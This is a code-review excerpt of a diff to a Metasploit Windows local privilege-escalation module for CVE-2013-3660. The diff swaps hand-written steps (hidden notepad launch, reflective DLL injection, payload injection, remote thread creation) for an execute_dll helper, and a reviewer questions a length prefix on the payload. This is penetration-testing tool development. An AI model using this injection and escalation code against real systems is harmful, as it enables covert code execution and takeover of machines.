modules/exploits/windows/local/ppr_flatten_rec.rb

```diff
@@ -123,27 +123,14 @@ def exploit
       fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
     end
 
-    print_status("Launching notepad to host the exploit...")
-    process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
-    host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
-    print_good("Process #{process.pid} launched.")
-
-    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
-    library_path = ::File.join(Msf::Config.data_directory, "exploits",
-                               "cve-2013-3660", "ppr_flatten_rec.x86.dll")
-    library_path = ::File.expand_path(library_path)
-
-    print_status("Injecting exploit into #{process.pid} ...")
-    exploit_mem, offset = inject_dll_into_process(host_process, library_path)
-
-    print_status("Exploit injected. Injecting payload into #{process.pid}...")
-    payload_mem = inject_into_process(host_process, payload.encoded)
-
     # invoke the exploit, passing in the address of the payload that
     # we want invoked on successful exploitation.
-    print_status("Payload injected. Executing exploit...")
-    host_process.thread.create(exploit_mem + offset, payload_mem)
-
+    print_status('Reflectively injecting the DLL into a new process and triggering the LPE...')
+    encoded_payload = payload.encoded
+    execute_dll(
+      ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-3660", "ppr_flatten_rec.x86.dll"),
+      [encoded_payload.length].pack('I<') + encoded_payload
```

Comment:
This does not look like the payload is expecting the length to be prefixed to it.

Reply:
Resolved with https://github.com/rapid7/metasploit-framework/pull/15384/commits/4ab1b6ca11cc7b025da6094ec4552eaaa8ad657b